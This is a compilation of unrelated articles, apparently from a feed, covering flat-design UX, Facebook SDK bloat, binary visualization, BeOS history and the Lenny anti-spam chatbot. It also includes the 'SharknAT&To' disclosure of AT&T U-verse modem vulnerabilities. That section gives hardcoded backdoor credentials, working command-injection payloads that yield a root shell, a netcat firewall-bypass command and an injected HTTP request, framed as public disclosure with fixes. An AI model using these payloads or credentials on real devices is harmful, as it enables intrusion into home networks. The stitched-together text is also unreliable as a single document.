This suggests that the low-contrast presentation of in-line links, compared with regular text, may be a slightly weaker signifier, but not perceptibly so. In the case of Brilliant Earth, the lack of contrasting color for links, however, had a big impact, as shown above. We can speculate that there is a contrast continuum: the stronger the color contrast between links and surrounding text, the higher the chance that users will recognize them.  If we had used a light grey highlight color in the weak version of Ally Bank, we might expect to the see a more dramatic difference in the gaze patterns. As long as in-line text links are presented in a contrasting color, users will recognize their purpose, even without an underline.

The other two stimulus pairs with no discernible heatmap differences between the weak and strong versions had some traits in common, when compared to the rest of the stimuli:

  • Low information density. The pages contained relatively little content and ample white space, meaning that even things that didn’t stand out much still did stand out, because they weren’t competing with many other page elements.
  • Traditional layout. Elements (buttons, links, navigation) were located in standard positions, where users typically expect them to be.
  • Salient, high-contrast targets. The target elements were high-contrast compared to the items around them, and had plenty of space to separate them from those elements, making them more noticeable.

Weak Signifiers Increase Interaction Cost

We want our users to have experiences that are easy, seamless, and enjoyable. Users need to be able to look at a page, and understand their options immediately. They need to be able to glance at what they’re looking for and know instantly, “Yep, that’s it.”

The problem is not that users never see a weakly signified UI element. It’s that even when they do see the weak element, they don’t feel confident that it is what they want, so they keep looking around the page.

Designs with weak clickability signifiers waste users’ time: people need to look at more UI elements and spend more time on the page, as captured by heatmaps, average counts of fixations, and average task time. These findings all suggest that with weak signifiers, users are getting less of that feeling of empowerment and decisiveness. They’re experiencing click uncertainty.

When Flat Designs Can Work

These findings also confirm that flat or flat-ish designs can work better in certain conditions than others. As we saw in this experiment, the potential negative consequences of weak signifiers are diminished when the site has a low information density, traditional or consistent layout, and places important interactive elements where they stand out from surrounding elements.

Ideally, to avoid click uncertainty, all three of those criteria should be met, not just one or two. A site with a substantial amount of potentially overwhelming content, or radically new page layouts or patterns, should proceed with caution when adopting an ultraflat design. These characteristics echo our recommendations for adopting a flat UI without damaging the interaction on your site.

Notice that those characteristics are also just good, basic UX design best practice: visual simplicity, external consistency, clear visual hierarchy, and contrast. In general, if you have an experienced UX team that cares about user research, you’ll do better with a flat design than other product teams that don’t. If your designs are already strong, any potential weakness introduced by flat design will be mitigated. If you’re conducting regular user research, any mistakes you make in implementing a flat UI will be identified and corrected.

Limitations of the Study

To get comparable, interpretable results from this experiment, we had to ask users to do very focused, short tasks on a single page. In real life, users don’t do tasks that way. They arrive to your site, and don’t know who you are or what you do. They navigate to pages, and don’t know for sure that they’ll find what they’re looking for there. They explore offerings and options.

Remember that there’s a difference between findability and discoverability. Strong signifiers are helpful in situations where users care about finding something specific. They’re absolutely crucial in situations where you care that users discover a feature that they didn’t know existed.

SharknAT&To: Vulnerabilities in AT&T U-verse modems

$
0
0
Note: All ports referenced in the following post are TCP.

 Introduction

When evidence of the problems described in this report were first noticed, it almost seemed hard to believe. However, for those familiar with the technical history of Arris and their careless lingering of hardcoded accounts on their products, this report will sadly come as no surprise. For everyone else, prepare to be horrified.

In all fairness, it is uncertain whether these gaping security holes were introduced by Arris (the OEM) or if these problems were added after delivery to the ISP (AT&T U-verse). From examining the firmware, it seems apparent that AT&T engineers have the authority and ability to add and customize code running on these devices, which they then provide to the consumer (as they should).

Some of the problems discussed here affect most AT&T U-verse modems regardless of the OEM, while others seem to be OEM specific. So it is not easy to tell who is responsible for this situation. It could be either, or more likely, it could be both. The hope behind writing this is that the problems will be swiftly patched and that going forward, peer reviews and/or vulnerability testing on new releases of production firmware will be implemented prior to pushing it to the gateways. Security through obscurity is not acceptable in today’s high threat landscape and this is especially true regarding devices which a) route traffic, sensitive communications and trade secrets for millions of customers in the US, b) are directly reachable from the Internet at large, and c) have wireless capability and therefore have an additional method of spreading infection and releasing data.

Regardless of why, when, or even who introduced these vulnerabilities, it is the responsibility of the ISP to ensure that their network and equipment are providing a safe environment for their end users. This, sadly, is not currently the case. The first vulnerability found was caused pure carelessness, if not intentional all together. Furthermore, it is hard to believe that no one is already exploiting this vulnerability at the detriment of innocents. Which is why this report is not passing Go, not collecting $200, and is going straight to the public domain. The vulnerabilities found here will be ordered roughly from least to most prevalent.

1. SSH exposed to The Internet; superuser account with hardcoded username/password.

It was found that the latest firmware update (9.2.2h0d83) for the NVG589 and NVG599 modems enabled SSH and contained hardcoded credentials which can be used to gain access to the modem’s “cshell” client over SSH. The cshell is a limited menu driven shell which is capable of viewing/changing the WiFi SSID/password, modifying the network setup, re-flashing the firmware from a file served by any tftp server on the Internet, and even controlling what appears to be a kernel module whose sole purpose seems to be to inject advertisements into the user’s unencrypted web traffic. Although no clear evidence was found suggesting that this module is actually being used currently, it is present, and vulnerable. Aside from the most dangerous items listed above, the cshell application is also capable of many other privileged actions. The username for this access is remotessh and the password is 5SaP9I26.

Figure 1: Attacker view of cshell after login to an affected U-verse modem.

To reiterate the carelessness of this firmware’s release, the cshell binary is running as root and so any exploitable command, injection vulnerability or buffer overflow will result in a root shell. Yes, it is running as root, and trivially susceptible to command injection. Through the use of the menu’s ping functionality, and due to not sanitizing parameters, one execute arbitrary commands through the menu, or escape the menu altogether. An example payload is shown below.

>> ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells

>> ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells

>> ping -c 1 192.168.1.254;sed -i ‘s/remotessh:\/:\/bin\/cshell/remotessh:\/:\/bin\/nsh/g’ /etc/passwd

Now type exit and then reconnect via SSH. The prompt will change from NOS/xxxxxxxxxxxxx to Axis/xxxxxxxxxxxxxxx. At this point the attacker can type “!” and will be given a busybox root shel!.

Please note that the cshell binary was only examined briefly and only until the easiest exploit was found. Judging by the binary’s repetitive use of unsafe C functions, one can guess that hundreds of additional vulnerabilities exist. However, we find it highly amusing that the first vulnerability found was so trivial that it looks like it came out of one of those “hacking tutorials” that were popular in the 90’s (Google “how to hack filetype:txt”).

This is the first and least common vulnerability that was discovered. The number of exposed devices while not as huge as the rest, but it is still quite unacceptable when you realize that these devices directly correlate to people being put at unnecessary risk of theft & fraud.

Censys reports 14,894 hosts which are likely vulnerable. There is no guarantee expressed or implied in terms of this number being all-inclusive however.

2. Default credentials “caserver” https server NVG599

A HTTPS server of unknown purpose was found running on port 49955 with default credentials. The username tech with and empty password field conveyed access to this highly vulnerable web server, which used only a Basic Authorization scheme. The server seems slightly unstable with its authorization capacity, denying access on the first attempt even with valid credentials and eventually completely locking up with an “unauthorized” message. It remains unclear whether this is just poor coding or more security through obscurity, but either is unacceptable.

3. Command Injection “caserver” https server NVG599

How many vulnerabilities did you find in the screenshot above?

The next vulnerability is the caserver command injection vulnerability. The exact intended purpose of caserver is unclear but its implications are not. Caserver is an https server that runs on port 49955 of affected devices (which seems to only be the NVG599 modem). The caserver script takes several commands, including:

  • Upload of a firmware image
  • Requests to a get_data handler which enumerates any object available in its internal “SDB” databases with a lot of fruitful information
  • Requests to a set_data command which allows changes to the SDB configuration

The screenshot below shows the request which causes command injection, again … as the root user. Note that for the first request the server will probably reply “You are not authorized to access this page”. This can simply be ignored and resubmitting the request shown will yield command execution. The service can be a little quirky, it locks you out after about 5 requests, a reboot will fix the issue if you are testing and running into this problem. The User-Agent field seems to be required but any string will suffice.

There are countless ways to exploit this, but a few quick and dirty stacked commands using wget to download busybox with netcat (mips-BE) from an http server (no SSL support) and then spawn a reverse shell works well.

Estimating the number of hosts affected was trickier due to the service being on an uncommon port. Host search engines such as Censys and Shodan don’t commonly scan for these services or ports. Based on self-collected data, our ballpark figure is around 220,000 devices.

4.Information disclosure/hardcoded credentials

The next vulnerability involves a service on port 61001 which will give an attacker a plethora of useful data about the device. The attacker however, will need to know the serial number of the device ahead of time. Once this information is acquired, the request can be made.

Figure 3:Request to BDC server.

Just before the serial number notice the characters “001E46”. This number correlates with the model number and is a valid Arris Organizationally unique identifier (OUI). This particular OUI was brute-forced from a list of Arris OUIs obtained at https://www.wireshark.org/tools/oui-lookup.html.

When the correct serial number, OUI, and username/password are submitted as above the server will hang for several seconds before returning a response. Afterwards, several pieces of invaluable information are returned about the modem’s configuration, as well as its logs. The most sensitive pieces of information are probably the WiFi credentials and the MAC addresses of the internal hosts, as they can be used for the next vulnerability.

The hardcoded username/password credentials are bdctest/bdctest. This is the second most prevalent vulnerability but at the moment it is not the biggest threat since the modem’s serial number is needed to exploit it. This may change if an attacker were to find a reliable way of obtaining the serial number. If present, an attacker could use the aforementioned “caserver” to retrieve the serial number as well by requesting a valid file present in the webroot other that “/caserver”. Once such example of this would be “/functions.lua”. Sending a GET request to this file will return the serial number amongst the headers.

This normally would not be advantageous for an attacker since the presence of the caserver service equates to root shell access. However, if the caserver is locked, then this is a method to overcome the lockout since only the path ”/caserver” is locked-out.

5.Firewall bypass no authentication

The most prevalent vulnerability based solely on the high number of affected devices is the firewall bypass that is made possible by the service listening on port 49152. This program takes a three byte magic value “\x2a\xce\x01” followed by the six byte mac address and two byte port of whichever internal host one would like to connect to from anywhere on The Internet! What this basically means is that the only thing protecting an AT&T U-verse internal network device from The Internet is whether or not an attacker knows or is able to brute-force the MAC address of any of its devices! Note however, that the first three bytes (six characters) of a MAC address are very predictable since they correspond to the manufacturer. Given this an attacker could very well start out with this scheme with the unknowns marked as:

“\x2a\xce\x01\xab\x23\xed\x??\x??\x??\x??\x??”

To make matters worse, this tcp proxy service will alert the attacker when they have found a correct MAC address by returning a different error code to signify that either the host didn’t respond on the specified port or that an RST was returned. Therefore, the attacker is able to attack the MAC address brute-force and the port brute-force problems separately, greatly decreasing the amount of keyspace which must be covered. The scheme now looks something like this (guessing last three bytes of MAC):

“\x2a\xce\x01\xab\x23\xed\x??\x??\x??\xaa\xaa”

Followed by (Guessing port, same as a TCP port scan):

“\x2a\xce\x01\xab\x23\xed\x38\x41\xa0\x??\x??”

At which point is now feasible to for a determined hacker to use a brute force attack. Aside from the brute force approach, there are other methods of obtaining the MAC addresses. Such as the previously mentioned vulnerability, or using a wireless device in monitor mode in order to sniff the wireless client’s MAC addresses. Basically, if your neighbor knows your public IP address, you are in immediate danger of intrusion.

Going off of the example above, if the device with MAC address ab:23:ed:38:41:a0 has an http server running on port 80 (with the firewall configured to not allow incoming traffic) and an attacker wants to connect and issue a GET request on the webroot. The command will be:

python -c ‘print “\x2a\xce\x01\xab\x23\xed\x38\x41\xa0\x00\x50GET / HTTP/1.0\n\n”’ | nc publicip 49152

This will open an unauthorized TCP connection between the attacker and the “protected” web server despite the user never authorizing it.

It is believed that the original purpose of this service was to allow AT&T to connect to the AT&T issued DVR devices which reside on the internal LAN. However, it should be painfully obvious by now that there is something terribly wrong with this implementation. Added to the severity is the fact that every single AT&T device observed has had this port (49152) open and has responded to probes in the same way. It is also important to note that the gateway itself cannot be connected to in this manner. For example, an attacker cannot set the MAC address to that of the modem’s LAN interface and the port to correspond to the web configuration console. This attempt will fail. This TCP proxy service will only connect attackers to client devices.

In Conclusion

In 2017, when artificial intelligence runs the largest advertising firm on the Internet, when only last year the largest leaks in American history occurred, and where vehicles are self driving, autonomous, Internet connected, and hacked … why do we still find CGI injections, blank default passwords with root privileged services exposed, and what most will likely term “backdoored” credentials?

Developing software is no trivial ask, it is part of this company’s core services, but carelessness of this magnitude should come with some accountability. Below are some workarounds for the vulnerabilities described in this write-up, the time of full disclosure is gone (mostly), but let the time of accountability begin.

Accountability, or is ok to continuously accept free credit monitoring for vendors, governments, and corporations “accidentally” exposing your privacy and in this case, maybe that of your family’s too?

Vulnerability 1: SSH exposed to The Internet; superuser account with hardcoded username/password.

To disable the SSH backdoor, preform the following commands. Substitute “ipaddress” with your gateway’s IP address (internal or external).

ssh remotessh@ipaddress

(Enter password 5SaP9I26)

NOS/255291283229493> configure

Config Mode v1.3

NOS/255291283229493 (top)>> set management remote-access ssh-permanent-enable off

NOS/255291283229493 (top)>> save

NOS/255291283229493 (top)>> exit

NOS/255291283229493> restart

Vulnerabilities 2 & 3; Disable CASERVER for the NVG599.

If suffering also from vulnerability 4, please refer to vulnerability 4’s mitigation steps before proceeding with these steps. Using Burpsuite or some other application, which lets you customize web requests, submit the following request from to the gateway’s external IP address from outside of the LAN.

POST /caserver HTTP/1.1
Host: FIXMYMODEM
Authorization: Basic dGVjaDo=
User-Agent: Fixmymodem
Connection: Keep-Alive
Content-Length: 77

appid=001&set_data=fixit;chmod 000 /var/caserver/caserver;fixit

Vulnerability 4: Information disclosure/hardcoded credentials

At the present time we only have a fix for vulnerability 4 for those who have root access on their gateway. Root access may be obtained by vulnerabilities 1,2, 3, via a serial TTY line, or some other method unknown to us. We will, however, continue searching for a workaround to help those without root access.

For those suffering from the CASERVER vulnerability (port 49955) but not the SSH backdoor, submit the following command before disabling caserver.

POST /caserver HTTP/1.1
Host: FIXMYMODEM
Authorization: Basic dGVjaDo=
User-Agent: Fixmymodem
Connection: Keep-Alive
Content-Length: 77

appid=001&set_data=fixit;chmod 000 /www/sbdc/cgi-bin/sbdc.ha;fixit

Those with access to the SSH backdoor may submit the following command from cshell.

NOS/123456789>> ping -c 1 192.168.1.254;chmod 000 /www/sbdc/cgi-bin/sbdc.ha

Vulnerability 5: Firewall bypass no authentication

The most widespread vulnerability found is luckily the easiest to fix. This mitigation technique only requires access to the modem’s configuration portal and admin password (printed on label). While connected to the LAN, go to 192.168.1.254 in a web browser. Click on Firewall->NAT/Gaming.

Click on Custom Services. Fill in the fields as shown below. In The “Base Host Port” type a port number that is not in use by an internal host (this traffic will be directed to an actual internal host). Port 1 is usually a good choice.

Click Add.

Select a device in “Needed by Device” to redirect traffic to. Make sure the Service that was created in the previous step is selected. Click Add.

Port 49152 should now either not respond or send an RST. Otherwise, check and make sure a service is not running on the chosen internal port (port 1).

Disclaimer: No guarantee is expressed or implied that performing the actions described above will not cause damage to and/or render inoperable any or all electronic devices on and orbiting Earth, including your modem!  If you choose to proceed, you are doing so at your own risk and liability. 

Why 16% of the code on the average site belongs to Facebook, and what that means

$
0
0

According to data collected by BuiltWith.com, 6% of the top 10,000 most high-traffic sites load content from Facebook’s servers. For the vast majority of them, that content is likely Facebook’s Javascript SDK, a huge block of code that is needed to display such features as the Like button (as seen on many media sites) and Facebook comments widgets (also used on many big media sites, Buzzfeed among them). The SDK code is so big that it represents about 16% of the total size of all Javascript on the average web page.

One of the culprits behind modern websites taking so long to download

As a sizable and widely-used software library, the Facebook SDK is a nice way of illustrating some of the answers to the questions: just why is the average site today so big? And how much does size actually matter?

Why so big?

The Facebook SDK is very full-featured, duplicating many of the tools the average site is likely to already include for its own developers’ use: methods for retrieving data from other sites, for determining which browser and device the user is using so as to target specific features to them, and for displaying UI elements (like confirmation dialogs and buttons). If we categorize all of the pieces of the SDK, the breakdown looks like this:

The amount that each set of features in the SDK contributes to total filesize. (Note that this is the size of the file before it has been compressed; the final package will be smaller.) [Source data, methodology, and more screen-reader-compatible data table]

Of the sets of features, three stand out the most:

The three sets of features in the SDK that are completely irrelevant to the vast majority of users on most sites. Eliminating them — if it were possible to do so — would shave off roughly 20% of the SDK filesize. [Source data, methodology, and more screen-reader-compatible data table]

“Canvas” is Facebook’s system for apps that are intended to be loaded within Facebook (Facebook made a major push in the past to encourage developers to build apps that lived within Facebook; I’m not entirely sure how widely such apps are used today, but either way, a regular website does not use any of the Canvas-related features.) The cost of including them in the SDK is pretty marginal: only 1.5% of total size.

After that, we have legacy feature support. This reflects the fact that an API will accumulate multiple interfaces for handling the same features over time. For example, developers can write code that calls either FB.getLoginStatus() (the legacy approach to requesting the user’s current Facebook login status) or Auth.getLoginStatus() (the new, encouraged approach). The way to get around needing to include both sets of methods is releasing them in separate versions of the SDK, but Facebook opted not to do this, likely to simplify the experience for developers and to maximize the number of sites using the exact same file (to increase the likelihood that the average user already has it downloaded). This decision comes at a small cost: roughly 3.5% of the SDK code is for handling features that are explicitly marked as “legacy” (and it’s quite possible that there are many more “legacy” features that just aren’t explicitly marked as such).

Most significantly, the SDK includes a number of polyfills and polyfill-like utilities, which make up over 15% of its code. Polyfills are used to supply features that are found in newer browsers to older browsers, and sometimes also to supply newer features that are upcoming but haven’t been added to any browsers yet. Most of the polyfills included by the Facebook SDK are for features that are already included in browsers used by the vast majority of internet users. They serve only to make the SDK work for the < 1% of global internet users who are using old browsers like Internet Explorer 8, which many (if not the vast majority of) major sites have given up on supporting.

Of the remaining ~80% of the SDK, it’s a bit more difficult to untangle which features are needed for which purpose. This is because it is written such that, to use a simple feature like the Like button, one must also include code that is used only for comments, video embeds, login buttons, and other unrelated features. Facebook could have opted to distribute much smaller files for including only single features such as Like buttons, but has a business goal of encouraging sites to use as many FB-provided features as possible.

Does size matter?

Due to the widespread use of Facebook’s SDK, and the fact that it changes relatively infrequently, many users are likely to have already downloaded it before they load a site. In fact, this is a big part of the rationale for why Facebook would distribute such a huge file, rather than smaller ones for specific features such as Like buttons. And on most users’ network connections — at least those in developed countries — the time it takes to download the file is marginal.

But regardless of whether the user’s browser already has the SDK downloaded, there is still overhead involved in running a large block of Javascript, especially on mobile devices. On the relatively new MacBook Pro I’m writing this on, Facebook’s SDK takes around 50ms (1/20th of a second), to run on a site like Buzzfeed. Not bad — especially when taken in context with the rest of the JS code, including ad-related code that takes far longer to execute — but still a non-trivial cost for something that is only used to display comments on the very bottom of the page.

Script evaluation in Chrome on a recent MacBook Pro

On a very new smartphone (Google Pixel), the JS execution time is doubled, now taking over 1/10th of a second:

Script evaluation on a Google Pixel smartphone

When looked at in context, this is a tiny fraction of the total code execution time on the page. But it adds to the amount of time during which scrolling or otherwise interacting with the page can be a choppy and unpleasant experience. And this gets at an important point: this particular SDK has a marginal cost, but modern websites — especially media sites — often include similar code from a large number of third parties (this example I captured from Gawker before it was killed by a billionaire vampire shows just how many such requests there can be).

Even setting aside the privacy impact of sending some user information to each of these third parties, the cost of all these features adds up quickly. Each third-party script that a site adds comes at a cost, both in terms of performance and in helping to rationalize the addition of the next “relatively harmless” chunk of third-party code later on. Besides the immediate performance impact of the additive cost of all of this code, this impacts developer morale: imagine working for days to shave off 10% of your own code’s load time, only to see a giant block of third-party code added that dwarfs the impact of that painstaking effort. And then (if you work for a media site), seeing this same pattern repeat itself over and over again every few months.

Should you include it?

If you need to use a feature like Facebook Comments, there’s no getting around the need to load the Facebook SDK. But depending on how your site is structured, you may be able to limit the SDK’s performance impact by only loading it when needed (e.g. once the user has scrolled down to the point where comments should become visible).

If you want to use the Like button, stop and reconsider. Facebook no longer displays Likes of a page prominently (or, in most cases, at all) on user timelines. It’s better to use a simple custom Share button or link, and as a side benefit, doing so will prevent Facebook from tracking all visits to your page and interfering with the privacy of your users. Sites that have eliminated the Like button have failed to identify any negative impact of doing so when it comes to Facebook traffic referrals.

Binary data visualization

$
0
0

This page contains examples of Veles visualization. For explanation on how they actually work check out Binary visualization explained.

By testing Veles visualizations on numerous files we found that different types of data look very differently.
We can easily notice the differences between a bitmap, a mobi file, a java .class file and an x86 compiled binary.


On a side note – visualizations of compressed or encrypted data look like a bunch of noise. Any trace of pattern in the visualized data immediately stands. For example, compare the gpg encrypted data and a .zip archive below. visualization makes it easy to spot headers in a zip archive. By switching to a “layered digram” mode of visualization we can immediately locate the headers at the end of the file. And not only that – we can also recognize certain patterns in the compressed stream (like the line on the right side of image).


Back to compiled binaries. We found out that any machine code looks roughly similar, but different architectures have their characteristic traits that can be used to recognize them. Below is the same binary compiled using three different architectures:


Ok, now let’s take a look at a specific file. For this demo, we’ll use libc.so from ubuntu 14.04.

Recognising x86-64 architecture

As mentioned in the video, we can recognise x86-64 code by finding 2 characteristic bars in the trigram view. Such a pair of bars means that there is a common sequence of 2 similar bytes (let’s call them x and y). One of the bars will correspond to trigrams <something, x, y>, while the second bar will be made of trigrams <x, y, something>.

So why do we see these bars in x86-64 machine code? It turns out that the default operand size for many instructions in 64-bit mode is 32 bits. If we want to use a 64-bit register we need to add a REX prefix. That means we prefix the instruction opcode with an additional byte with a value 0x40 + flags on lower 4 bits. In particular, many variants of MOV instruction will have a 2 byte opcode 0x4X 0x8Y (where X and Y depend on exactly which version of the instruction we used). Since MOV is an extremely common instruction, there will be a lot of those digrams in any x86 64-bit binary and we will clearly see the bars in trigram view. It’s also worth mentioning that another common instruction – LEA – happens to have 0x4X 0x8D opcode, which makes the bars even more visible.

.gnu.hash

As mentioned in the video the .gnu.hash section of ELF is made of 3 distinct parts:

  • Bloom filter

    This is a probabilistic set with a possibility of false positives. Basically, when inserting an object it’s hashed into a few bit locations and all those bits are set to 1. To check if the object is already in the set we can just check all of those bits – if at least one of them has a value of 0 then we know the object is not in the set. The idea behind including this in the ELF is to avoid (if possible) the more expensive hashmap lookups.

    In the visualization we can see that the Bloom filter is mostly random, but there are significantly more 0 bits than 1 bits in it. There are more numbers near the (0, 0, 0) corner of the cube. Additionally, we can see clusters of points near positions corresponding to values with just one or two 1s in binary representation.

  • Hash buckets

    Each value is the lowest index in the dynamic symbol table corresponding to a given hash. What we see in the visualization is relatively small values represented on 32-bit integers.

  • Hash values

    These are computed hash values. As expected, they look like a bunch of white noise in a visualization.

    For a more detailed description of how this section works, check out this link


BeOS almost made Apple a different company (2015)

$
0
0

Steve Jobs returned to Apple after a 12-year absence when it acquired his company NeXt in 1997.

Under his leadership, Apple went on to reinvent itself as a leading consumer electronics company and the most valuable publicly traded company in the world.

But it almost didn't happen. Apple came this close to acquiring another company instead, a startup also founded by an Apple alumnus that for a brief moment had what was considered the world's hottest operating system: Be Inc.

Be was founded in 1990 by former Apple COO Jean-Louis Gassée and Apple director of hardware engineering Steve Sakoman, who helped bring Apple's first mobile computer, the Newton, into being. Initially, the company sold its own hardware called the BeBox. But what Apple wanted was the BeOS operating system.

It's hard not to wonder what the past couple decades of tech history would have looked like if Apple had gone the other way.

BeOS was an insanely fast and efficient operating system for its time. It could boot in less than 10 seconds, supported dual processors, and, as you can see in the video above, one of the company's favorites stunts was using it to run multiple videos at once. That might not sound like much today, but it was enough to wow `90s computer users who were used to waiting minutes for Windows to boot and were lucky if they could play even a single video at a time.

BeOS attracted a cult following akin to that of the Amiga. Science fiction author Neal Stephenson even called it the Batmobile of operating systems in his book In the Beginning Was the Command Line. But in 1997 BeOS was still rough around the edges, and Gassée and his backers reportedly wanted far more for Be Inc. than Apple thought the company was worth. So Apple acquired NeXt, used its operating system NeXTstep as the basis for OS X, and left Be to fend for itself.

Not Dead Yet

Be never did find a foothold in the market, even after it started selling BeOS as a stand-alone product. The company blamed interference from Microsoft and sued the company for antitrust in 2002. The case was [settled](http://www.computerweekly.com/news/2240052523/BeOS-will-live-on-as-Microsoft-settles-legal-action) for $23.3 million in 2003, but it was too late for Be, which had already been sold to Palm.

BeOS became the foundation of PalmOS 6, but it was never used on any Palm device. Its intellectual property is now owned by Access, which acquired Palm Source in 2005.

But like most pieces of retro-tech, BeOS still didn't quite die. A German company called yellowTAB continued to sell the operating system for a few years. But more importantly, open source clones sprang up, most significantly Haiku, which aims to be fully compatible with BeOS.

Meanwhile, its engineering team continues to shape the operating system landscape to this day. Many of Be's engineers moved on to a company called Danger, the company behind the Sidekick. When Danger founder Andy Rubin left the company in 2003 to found Android, which was of course later acquired by Google, many of those developers went with them. A few of them still work on Android today. Then there's Dominic Giampaolo, the creator of Be File System, one of the most critically acclaimed parts of the operating system. In 2002 Giampaolo was hired by Apple, where he has worked on file systems and the Spotlight feature.

These days Gassée says he's glad Apple bought NeXt instead of Be. But it's hard not to wonder what the past couple decades of tech history would have looked like if Apple had gone the other way.

Using chatbots against voicespam: analyzing Lenny’s effectiveness

$
0
0

Using chatbots against voice spam: analyzing Lenny’s effectiveness Sahin et al., SOUPS’17

Act I, Scene I. Lenny is at home in his living room. The phone rings.

Lenny: Hello, thi- this is Lenny!
Telemarketer: Lenny, I’m looking for Mr. NameRedacted
Lenny: Uh– sso- sorry, I’b- I can barely hear you there?
Telemarketer: homeowner
Lenny: ye- yes yes yes
Telemarketer: Mr. NameRedacted, we’re giving free estimates for any work you need on your house. Were you thinking about having any projects? A little craning driveway, roof work, anything you need done. We’ll give you a free estimate.
Lenny: oh good, yes, yes, yes.
Telemarketer: what would you like to have done? What were you thinking about? Anything around the house?
Lenny: uh yes, yes, uh, uh, someone, someone did- did say last week or someone did call last week about the same thing, wa-was that, was that, you?
Telemarketer: No, sir. I’ve might have been in another company. What was it that you were doing?
Lenny: ye-yes. ss- sorry, what- wa- what was your name again?
Telemarketer: yes. What were you thinking about having done?
Lenny: well, it- it it’s funny that you should call, because my third eldest Larissa, uhh, she, she was talking about this. uh, just this last week and you, you know sh- she is- she is very smart I would – I would give her that, because, you know she was the first in the family, to go to the university, and she passed with distinctions, you know we’re- we’re all quit proud of here yes yes, so uhh, yes she was saying that I should , look, you known, get into the, look into this sort of thing. uhh, so, what more can you tell me about it?
Telemarketer: …

(The actual conversation keeps going for over 11 minutes – see Appendix A in the paper for the full transcript.)

Even better, you can listen to a whole playlist’s worth of Lenny’s conversations on YouTube. If you haven’t guessed already, Lenny is a bot which plays a set of pre-recorded voice messages to interact with spammers. You might be surprised just how simple Lenny actually is (though a lot of thought has gone into what he says), yet he’s proven to be very effective at keeping spammers talking for a long time.

The problem of unwanted phone calls.

Just in the US alone there were over 5 million complaints about unwanted or fraudulent calls in 2016. About 75% of generic fraud-related complaints cite telephone as the initial method of contact. The people behind unwanted calls may be for example fundraising, telemarketing, or simply scamming. The callers may use robocalls playing pre-recorded messages, or real people in call centres. Having real people do the calling makes campaigns more effective. Among the 5 million 2016 complaints, 64% were robocalls, and hence 36% involved human agents. The cost of employing people becomes the limiting factor for fraudsters.

Callers have a script that they follow. For example, many spam calls begin with the following components:

  • greeting (e.g. ‘Hello’)
  • self-identification (name of the call agent)
  • company identification (name of the business)
  • warm up talk (‘how are you today?)
  • statement of the reason for the call
  • callee identity check (callee’s name and attribute)

Through a call, spammers may ask a number of questions. Even if the target does not in the end follow through on the offer, this information can used to enrich datasets for future campaigns. Here’s a quick summary of popular spam call types and the sorts of information they may request:

(Enlarge).

How Lenny works

Although there is no indisputable evidence of this chatbot’s origins, some information can be found online. Lenny has been reported to be a recording performed for a specific company who wanted to answer telemarketing calls politely. Later, the recordings were modified to suit residential calls.

Even without any AI or speech recognition mechanism Lenny is able to trick many people and keep conversations going for many minutes, and in one case up to an hour!

Conversations with a hosted version of Lenny are available on a public YouTube channel (conducted in a country and under conditions which make the recordings legal), and it is a selection of 200 calls from this archive which are analysed for this paper. When a phone user identifies a spam call they can transfer the call to the PBX server hosting Lenny, or alternatively have blacklisted spam numbers sent straight to Lenny without even answering.

Lenny simply plays a set of audio recordings one after another to interact with the caller. The same set of prompts is always used in the same order. Lenny is controlled by an IVR script which allows simple scripting and detection of silences.

The script starts with a simple “Hello, this is Lenny.” and will wait for the caller to take his turn. If he does not respond within 7 seconds, the server switches to a set of “Hello?” playbacks until the caller takes his turn. However, if the caller speaks, the IVR script waits until he finishes his turn. The script detects the end of the caller’s turn by detecting a 1.55 second long silence period, at this point it will play the next recording. When the 16 distinct turns that are available have been played, it returns to the 5th turn (the 4 first prompts are supposed to be introductory adjacency pairs) and continues playing those 12 turns sequentially, forever.

The secret behind Lenny: conversation analysis

Why does a fixed set of 16 pre-recorded responses work so well?? Lenny’s secret is that it’s based upon findings from Conversation Analysis– something that might be of use to anyone designing bots in other contexts too!

Conversation Analysis (CA) is a sociological perspective which aims at studying the organization of natural talk in interactional order to uncover the seen but unnoticed methodical apparatus which speakers and recipients use in order to solve the basic organizational issues they deal with while talking. Trying to show how the participants to a conversational exchange orient themselves on those methods, CA adopts a descriptive stance, deeply rooted into the detailed analysis of recorded conversational exchanges.

Key results from CA date back to the 1970’s. There are four main mechanisms in conversations which have been isolated and explained:

  • The turn-taking apparatus: methods used to minimise gaps and overlaps while taking turns in a conversation
  • Trouble management: how speakers repair any trouble in hearing, understanding, or speaking
  • The ‘sequential organisations of actions in talk exchanges’ which describes how conversationalists assemble their turns in sequences of actions that go together. One common type of sequence is the adjacency pair: for example question -\> answer, greeting exchanges, offers -\> accept/reject and so on.

… adjacency pairs point to the normative expectations that are embedded into the ways we order turns at talk as pairs.

  • The last mechanism clarifies how speakers use membership categories during talk exchanges (for example, being elderly).

Calls with Lenny

The 200 randomly selected calls from the 487 publicly available at the time of the study were sent to a commercial transcription service, and selected fragments were further converted to the ‘Jeffersonian transcription notation‘ required for very fine-grained analysis. Call logs from 19,402 calls to the PBX were also analysed.

Best not to answer your phone if someone calls around 1pm on a Wednesday it seems!

Here’s the breakdown of how long Lenny managed to keep spammers talking for conversations on the YouTube channel. Spammers on average spend 10:13 minutes talking to Lenny, and these conversations have an average of 58 turns!

…72% of calls contain Lenny’s set of scripts repeated more than once. On average, a caller hears 27 turns of Lenny, which corresponds to 1.7x repetition of the whole script… Surprisingly, in only 11 calls (5%), the caller realizes and states that he is talking to a recording or an automated system.

Spammers get frustrated talking to Lenny, but only scammers tend to start cursing!

Here’s a reminder of Lenny’s first five steps (T1 to T5):

From a CA perspective there are both sequential and turn-constructional features here which help to keep the call going. T1 and T2 are first pair parts from adjacency parts, which project second pair parts. T3 and T4 are designed as second-pair parts of an adjacency pair (i.e., they are designed to follow a question, proposal, request etc.). T4 adds the ‘oh’ turn-initiated particle, “which has been demonstrably analyzed as a change-of-state token” and works well when followed by an assessment token (‘good’) and the affirmations (yes, yes, yes). T5 pre-supposes that the reason for the call has been previously introduced by the caller. Almost all turns display self-initiated self-repairs.

Inspecting Lenny’s turns in isolation is not sufficient enough to understand how Lenny can be so efficient in so many different calls. This efficiency is locally built in each call development. Once embedded into a real call, Lenny’s turns display an understanding of prior turn and brings new material to be understood by his co-participant. This in situ inspection of Lenny’s turn is inevitably made, with more or less care, by the participants, in order to build their own contribution and to fit each new turn into the ongoing conversation. This is what CA calls the “next-turn proof procedure” and what explains the various, flexible ways in which Lenny’s turns can play their part in some calls.

Sadly, we have to wait for another paper for analysis of Lenny’s conversation beyond the introduction. (But remember you can check out some of the recorded conversation to hear it for yourself).

